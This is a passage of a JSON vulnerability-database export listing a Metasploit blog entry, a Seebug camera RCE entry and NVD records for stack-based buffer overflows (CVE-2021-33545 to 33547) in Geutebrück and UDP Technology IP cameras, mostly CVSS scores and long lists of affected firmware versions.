"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T20:05:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653", "CVE-2021-3287", "CVE-2021-33549"], "modified": "2021-09-24T20:05:51", "id": "RAPID7BLOG:E8FC7BBDB9A9C360054240EFAF9BA636", "href": "https://blog.rapid7.com/2021/09/24/metasploit-wrap-up-131/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-08-10T12:17:32", "description": "", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "seebug", "title": "UDP Technology IP \u6444\u50cf\u5934\u8ba4\u8bc1\u7ed5\u8fc7 RCE \u6f0f\u6d1e\uff08CVE-2021-33543\u3001CVE-2021-33544\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33543", "CVE-2021-33544"], "modified": "2021-08-10T00:00:00", "id": "SSV:99328", "href": "https://www.seebug.org/vuldb/ssvid-99328", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:37:35", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33546", "cwe": ["CWE-121"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33546"], "modified": "2021-09-27T14:31:00", "cpe": ["cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27"], "id": "CVE-2021-33546", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33546", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:37:37", "description": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33547", "cwe": ["CWE-121"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33547"], "modified": "2021-09-27T14:30:00", "cpe": ["cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27"], "id": "CVE-2021-33547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33547", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-28T14:36:25", "description": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33545", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33545"], "modified": "2021-09-27T14:30:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5"], "id": "CVE-2021-33545", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33545", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", 